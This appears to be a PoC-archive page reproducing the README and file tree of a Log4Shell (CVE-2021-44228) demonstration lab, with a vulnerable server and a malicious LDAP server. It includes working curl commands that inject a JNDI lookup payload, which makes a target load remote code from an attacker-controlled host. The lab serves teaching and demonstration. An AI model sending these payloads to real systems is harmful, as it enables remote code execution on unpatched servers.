关联漏洞
描述
Demo to show how Log4Shell / CVE-2021-44228 vulnerability works
介绍
# Log4Shell in action
This project aims to demonstrate how the Log4Shell / CVE-2021-44228 vulnerability works.
## Requirements
You only need to have Docker installed. Ideally you have two different virtual machines. One for the _vulnerable server_ and one for the _malicious server_ that will host the malicious codebase and a LDAP server.
Optionally you have _Make_ and _Docker Compose_ installed but this is **not** necesarry since this repo also contains a `make.sh` to skip these requirements and use them from within a docker container.
## Install Docker (optionally)
If you haven't already, here are the steps to install Docker on a Debian VM. You can use these steps: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46
## Download the repository
```
git clone git@github.com:mschmnet/Log4Shell-demo.git
```
## Install vulnerable server
```
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed
```
## Start malicious server
This will start a basic LDAP server and basic Python server to serve the malicious Java classes.
You need to provide the IP address or domain name where these servers will be available
```
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed
```
## How to attack the target server
```
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint
```
or just
```
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'
```
where `${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}` is just URL encoded
## How to stop any of them
```
../make.sh stop
```
## How to show the logs
```
../make.sh logs
```
## Slides
https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf
文件快照
[4.0K] /data/pocs/90d4d9419ecd735cd6973fbc8521d19c2c3434ef
├── [4.0K] html
│ ├── [4.0K] img
│ │ ├── [ 60K] apache-versions.png
│ │ └── [168K] Log4Shell_logo.png
│ └── [ 55K] slides.htm
├── [4.0K] img
│ ├── [ 60K] apache-versions.png
│ └── [168K] Log4Shell_logo.png
├── [1012] Makefile
├── [ 160] make.sh
├── [4.0K] malicious-server
│ ├── [4.0K] codebase
│ │ ├── [ 242] Dockerfile
│ │ ├── [ 623] pom.xml
│ │ └── [4.0K] src
│ │ └── [4.0K] main
│ │ └── [4.0K] java
│ │ └── [1.1K] Exploit.java
│ ├── [ 298] docker-compose.yml
│ ├── [ 236] Makefile
│ └── [4.0K] marshalsec
│ └── [ 522] Dockerfile
├── [4.0K] pdf
│ └── [375K] slides.pdf
├── [2.0K] README.md
├── [2.8K] slides.md
└── [4.0K] vulnerable-server
├── [ 137] docker-compose.yml
├── [ 219] Dockerfile
├── [ 181] Makefile
├── [9.8K] mvnw
├── [6.5K] mvnw.cmd
├── [2.0K] pom.xml
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] net
│ │ └── [4.0K] mschm
│ │ └── [4.0K] log4shell
│ │ └── [4.0K] vulnerableserver
│ │ ├── [ 557] Controller.java
│ │ └── [ 355] VulnerableWebServerApplication.java
│ └── [4.0K] resources
│ ├── [ 1] application.properties
│ ├── [ 466] log4j2.xml
│ └── [4.0K] static
│ └── [ 90] index.html
└── [4.0K] test
└── [4.0K] java
└── [4.0K] net
└── [4.0K] mschm
└── [4.0K] log4shell
└── [4.0K] vulnerableserver
└── [ 241] VulnerableWebServerApplicationTests.java
26 directories, 28 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。